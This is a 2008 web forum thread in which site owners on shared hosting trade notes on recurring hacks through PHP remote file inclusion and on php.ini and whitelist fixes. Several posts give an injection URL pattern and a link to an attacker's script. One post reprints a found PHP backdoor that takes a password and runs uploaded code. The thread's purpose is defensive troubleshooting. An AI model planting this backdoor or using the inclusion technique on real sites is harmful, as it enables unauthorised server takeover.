#16
  1. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2002
    Posts
    222
    Rep Power
    17
    Originally Posted by jedimasta
    I'm running GoDaddy and coincidently was considering BlueHost as an alternative.
    I've been with BlueHost for years and they have been great up until this point. Sometimes the support from BlueHost is lacking, but on this issue I had good support from someone who cared and seemed interested in resolving it.

    I don't really think that my admin password was the problem because if it was and they had access to all my sites, the choice of the site they attacked seems illogical. I have more popular sites on that account.

    Also, the site that got attacked has no hackable scripts (to my knowledge) because there ARE NO scripts to hack.

    I think wordpress code was exploited.

    I dunno...

    I was considering ixwebhosting.com as an alternative.
    _____________________________________________
    Sites & Interests:
    Sexy Wallpapers
    SEO Chat
  2. #17
  3. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    I have had this same exact problem for the last 6 or 7 months. However, the hacker actually decided to go ahead and delete all of my files and change my password a few weeks ago. The way they are getting in is by exploiting a flaw in global variables and passing URLs through my site that give them full access to do whatever they want. I copied one of the programs that has been run on our site in the past, though this is probably a different program than what is being run to do the .htaccess hack, but its the same method and yields the same results.

    copy of program: "free.radio.su/bobatka.info.txt" << THIS FILE MAY CONTAIN VIRUSES BUT REMAINS FOR THREAD RELEVANCE >>

    If you run this program keep in mind it will create a file errors.php that can be used for further exploits, so keep that in mind. For my site the hacker is running the program by exploiting the variable incFile, for instance:

    /index.php?Tab=Category&incFile= INSERT PROGRAM HERE

    Like I said this is different than the .htaccess program, but it works the same and uses the same exploit to take over your site. If you have a variable that could be exploited. So basically the hacker is taking advantage of this global variables PHP exploit and inserting the URL of the code they run remotely into the URL so that they can run the program onto your server. How to fix the problem? Make it so the hacker can't pass URLs on your site. My problem isn't knowing how they are getting in, its being able to fix it, and with my very limited PHP knowledge that is not something I can do.
    Last edited by jharnois; March 17th, 2008 at 04:46 PM. Reason: Added notice to users about linked file.
  4. #18
  5. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jul 2004
    Posts
    10
    Rep Power
    0
    Originally Posted by scataloth
    I have had this same exact problem for the last 6 or 7 months. ...
    The solution I'm adopting is in sanitizing the variables. Yeah, you could disable globals, but that is virtual death to dynamically driven sites like mine. Though I've yet to actually test it, I'm still using GET variables in the URL, but they are checked for valid content before being passed to the page. For example:

    Code:
    /?page=displayArticle&articleNum=45
    a savvy enough user could figure out that displayArticle is a php file and could use the exploit to run external scripts:

    Code:
    ?page=http://www.yahoo.com...
    What I'm in the process of doing is validating the variable against an array of options and doing as much as I can to eliminate GET variables that would be used directly in SQL or page includes:

    Code:
    $valid = array('displayArticle','displayPoll','displayDiscussion');
    if (in_array($_GET['page'], $valid)) { 
    					include($_GET['page'] . '.php');
    				}else {
    					include('error.php'); // display error
    				}
    It's a good start anyway. Of course this isn't my ACTUAL code, cuz I'm not that green.
  6. #19
  7. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    Ok, I did some google searching today and came across this fix. In your php.ini file (if you don't have this make a plain text file called this) insert the code:

    allow_url_fopen = Off

    This prevents people from passing remote URLs through your site. So far it looks like this works since I can no longer do just that. However, these hackers are pretty sophisticated so I wouldn't be surprised if they know of a way around this or have another exploit that they could be using, but at least I know that one of the hacks that I have experienced in the past will no longer work with this turned OFF. The hackers have been attacking almost every day for the past few weeks, so if they don't attack tonight or tomorrow I'll feel pretty confident it is a good fix.
  8. #20
  9. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jul 2004
    Posts
    10
    Rep Power
    0
    Originally Posted by scataloth
    ...
    allow_url_fopen = Off
    ...
    Keep me posted, if you wouldn't mind. This is the fix offered up by GoDaddy, but initially I don't believe it did anything. The logs showed the attacker attempting the injection hack again, but the fact is that my sites filed were removed to prevent further attempts entirely.
  10. #21
  11. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    Sure, I will let you know what happens.
  12. #22
  13. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    So far so good.
  14. #23
  15. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    Just a quick update. Looks like creating a php.ini file and adding the line:

    allow_url_fopen = Off

    ... fixed the problem completely. I also decided to go ahead and add the following settings to php.ini to prevent the hackers from getting any additional information:

    allow_url_fopen = Off
    register_globals = Off
    display_errors = Off
    expose_php = Off
    log_errors = On

    Also make sure that you add this to your .htaccess file so people can't see your php.ini settings:

    <Files php.ini>
    order allow,deny
    deny from all
    </Files>

    Also make sure to remove the code that is inserted into all of your .css and .js files on the server! In addition there should be a few .php files that the hackers probably put on your server as well which will allow them to regain entry into your site if you don't remove them. Just look at your access logs for any POST commands and see where the files are located. So #1 make sure to create a php.ini file with the settings above and #2 clean up all your files and remove any malicious code from your .js and .css files as well as any additional .php files that shouldn't be there. That's it! Problem solved. So far no hacking for over a week since I did this.
  16. #24
  17. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jul 2004
    Posts
    10
    Rep Power
    0
    Originally Posted by scataloth
    ... fixed the problem completely...
    Indeed. These steps are basically the same that I put into place after tearing my hair out over the past few weeks. My site is now back up and though I've seen a few hits of people attempting the injection hack, all have failed. My code remains clean and my traffic is slowly ramping back up after being 404 for several days.

    Thanks everyone for the back and forth. It helps knowing I'm not the only one out there.
  18. #25
  19. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2002
    Posts
    222
    Rep Power
    17
    UPDATE:

    Well, apparently changing the password to my BlueHost account didn't really help that much.

    A week ago I deleted the entire Wordpress folder that contained the offensive code. In fact, I deleted ALL the code from that site entirely. (It's just a testing domain anyway).

    Today I logged in to my server to test another piece of code on that domain, and I saw that /wp-includes/js/tinymce/themes/advanced/uhe/ex3/t.htm had reinstalled itself.

    YARGH!!

    But my sites haven't been hacked again, so it hasn't had any negative effect that I know of.

    Let me know if you figure out a way to get over this hack!!
    _____________________________________________
    Sites & Interests:
    Sexy Wallpapers
    SEO Chat
  20. #26
  21. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2002
    Posts
    222
    Rep Power
    17
    Originally Posted by jedimasta
    I'm running GoDaddy and coincidently was considering BlueHost as an alternative.



    That sounds like the same excuse I got from my techs...
    Well, apparently it didn't work. After deleting the entire site that contained the wordpress directories that were hacked, I logged in to that account and found that all those subdirectories had magically reinstalled themselves.(juiceboxlabs/wp-includes/js/tinymce/themes/advanced/uhe/ex3/t.htm)

    At least none of my live sites have been affected by the reappearance of this code. Nothing seems to be broken.

    I don't really like this and I don't really know what to do. I do'nt really want to switch hosts..
    _____________________________________________
    Sites & Interests:
    Sexy Wallpapers
    SEO Chat
  22. #27
  23. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    Originally Posted by Hugh G. Rection
    Well, apparently it didn't work. After deleting the entire site that contained the wordpress directories that were hacked, I logged in to that account and found that all those subdirectories had magically reinstalled themselves.(juiceboxlabs/wp-includes/js/tinymce/themes/advanced/uhe/ex3/t.htm)

    At least none of my live sites have been affected by the reappearance of this code. Nothing seems to be broken.

    I don't really like this and I don't really know what to do. I do'nt really want to switch hosts..
    Removing the files isn't enough, did you take the steps mentioned above about adding this to your php.ini file?

    allow_url_fopen = Off
    register_globals = Off

    After you do that you'll need to check and see if any of your .css and .js files are infected AND make sure to remove the 3 or 4 other backdoor .php files that will likely be on your server. Keep in mind your backup copy of your site could be infected if its a backup of the infected site! (I know that sounds like common sense.) Doing those few things 100% fixed the problem so far for me. I was getting hacked almost daily for the past 6 months and once I did this, I haven't been hacked one time since doing this.
  24. #28
  25. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2002
    Posts
    222
    Rep Power
    17
    Originally Posted by scataloth
    Removing the files isn't enough, did you take the steps mentioned above about adding this to your php.ini file?

    allow_url_fopen = Off
    register_globals = Off

    After you do that you'll need to check and see if any of your .css and .js files are infected AND make sure to remove the 3 or 4 other backdoor .php files that will likely be on your server. Keep in mind your backup copy of your site could be infected if its a backup of the infected site! (I know that sounds like common sense.) Doing those few things 100% fixed the problem so far for me. I was getting hacked almost daily for the past 6 months and once I did this, I haven't been hacked one time since doing this.
    I'll try this soon. Thanks.
    _____________________________________________
    Sites & Interests:
    Sexy Wallpapers
    SEO Chat
  26. #29
  27. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2002
    Posts
    222
    Rep Power
    17
    I found this random php file somewhere in my folder structure. It was called menor.php

    Here is the code it had:

    PHP Code:
    <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"?>


    <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"?>
    I've edited my php.ini file and I hope it works.

    My server (Bluehost) also has a file called php.in (not .ini) ... is that the same thing? Do I need to edit both?
    Last edited by Hugh G. Rection; March 14th, 2008 at 01:21 AM.
    _____________________________________________
    Sites & Interests:
    Sexy Wallpapers
    SEO Chat
  28. #30
  29. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Mar 2008
    Posts
    10
    Rep Power
    0
    Originally Posted by Hugh G. Rection
    I found this random php file somewhere in my folder structure. It was called menor.php

    Here is the code it had:

    PHP Code:
    <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"?>


    <?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"?>
    I've edited my php.ini file and I hope it works.

    My server (Bluehost) also has a file called php.in (not .ini) ... is that the same thing? Do I need to edit both?
    Not sure if you need to edit both or not, but make sure you get rid of all the files that don't belong. When I had this happen to me, there were 3 .php files on my server that did not belong in addition to the fake blog folder that was created. That's not to say that you will have more or less, but I'd strongly recommend taking a good look at all of your files and see if you missed any. Also clean up all of your .css and .js files. Almost every single .css and .js file on my server had a chunk of code all the way at the bottom, you'll know it when you see it. Delete that chunk of code from every .css and .js file. Create a php.ini file as suggested earlier with the settings listed. Change your FTP and cPanel passwords as well to play it safe. Check your error_log and access_log to see if there are any POST commands to your server not requested by you. If there are, see what file they are referring to, this is how I found out the 3 .php files that didn't belong, they were backdoor files that allowed remote access to the server even after patching up the exploit with the php.ini settings. After you do all that it should be hack-free and you should not receive anymore attacks using this particular exploit.

IMN logo majestic logo threadwatch logo seochat tools logo